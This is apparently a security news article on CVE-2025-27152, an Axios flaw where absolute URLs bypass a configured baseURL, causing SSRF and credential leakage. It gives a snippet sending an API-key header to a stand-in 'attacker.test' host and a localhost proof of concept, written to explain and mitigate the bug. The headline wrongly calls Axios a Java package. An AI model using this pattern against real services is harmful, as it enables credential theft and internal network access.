Cyber Security News

Java Axios Package Vulnerability Threatens Millions of Servers with SSRF Exploit

A critical security issue has been identified in the Axios package for JavaScript, which poses significant risks to millions of servers due to server-side request forgery (SSRF) and credential leakage.

This vulnerability occurs when absolute URLs are used in Axios requests, even when a base URL is specified.

CVE-2025-27152 Overview

The vulnerability associated with Axios is identified by the CVE ID CVE-2025-27152. It affects versions of Axios less than or equal to 1.7.9 and has been rated with a moderate severity level.

import axios from "axios";

const internalAPIClient = axios.create({

  baseURL: "http://example.test/api/v1/users/",

  headers: {

    "X-API-KEY": "1234567890",

  },

});

// Example of an absolute URL being passed

const userId = "http://attacker.test/";

// SSRF Vulnerability Example

await internalAPIClient.get(userId); // Sends request to http://attacker.test/ instead of the baseURL

In the code snippet above, even though a base URL is set for the Axios client, passing an absolute URL to the get() method leads to requests being sent directly to the specified absolute URL.

This bypasses the intended security mechanisms, as sensitive credentials such as the X-API-KEY are included in the request headers and can be leaked to unintended hosts.

Proof of Concept

To demonstrate this vulnerability, a simple proof of concept (PoC) can be set up using two local HTTP servers.

  1. Setup Servers:
mkdir /tmp/server1 /tmp/server2

echo "this is server1" > /tmp/server1/index.html

echo "this is server2" > /tmp/server2/index.html

python -m http.server -d /tmp/server1 10001 &

python -m http.server -d /tmp/server2 10002 &
  1. Create a Test Script (main.js):
import axios from "axios";

const client = axios.create({ baseURL: "http://localhost:10001/" });

const response = await client.get("http://localhost:10002/");

console.log(response.data);
  1. Run the Script:
node main.js

The output will be “this is server2,” indicating that the request was successfully redirected to the unintended server.

Impact and Mitigation

The vulnerability poses two main risks:

  • Credential Leakage: Sensitive API keys or credentials might be exposed to third-party hosts if an absolute URL is passed.
  • SSRF (Server-Side Request Forgery): Attackers can leverage this exploit to make unauthorized requests to internal network hosts.

To mitigate this risk, users should update to Axios version 1.8.2 or later, where the issue has been fixed. Additionally, implementing strict validation for any user-provided URLs is crucial to prevent SSRF attacks.

The vulnerability was reported by @lambdasawa shared in Github, adding emphasis on the importance of community involvement in software security.

This recent security issue highlights the need for diligence in managing dependencies and validating inputs, especially with widely used libraries like Axios.

By updating to patched versions and enforcing robust security practices, developers can protect their applications and internal networks from SSRF and credential leakage threats.

Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free. 

Divya

Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Recent Posts

Zero-Trust Policy Bypass Enables Exploitation of Vulnerabilities and Manipulation of NHI Secrets

A new project has exposed a critical attack vector that exploits protocol vulnerabilities to disrupt…

10 hours ago

Threat Actor Sells Burger King Backup System RCE Vulnerability for $4,000

A threat actor known as #LongNight has reportedly put up for sale remote code execution…

10 hours ago

Chinese Nexus Hackers Exploit Ivanti Endpoint Manager Mobile Vulnerability

Ivanti disclosed two critical vulnerabilities, identified as CVE-2025-4427 and CVE-2025-4428, affecting Ivanti Endpoint Manager Mobile…

10 hours ago

Hackers Target macOS Users with Fake Ledger Apps to Deploy Malware

Hackers are increasingly targeting macOS users with malicious clones of Ledger Live, the popular application…

10 hours ago

EU Targets Stark Industries in Cyberattack Sanctions Crackdown

The European Union has escalated its response to Russia’s ongoing campaign of hybrid threats, announcing…

13 hours ago

Venice.ai’s Unrestricted Access Sparks Concerns Over AI-Driven Cyber Threats

Venice.ai has rapidly emerged as a disruptive force in the AI landscape, positioning itself as…

14 hours ago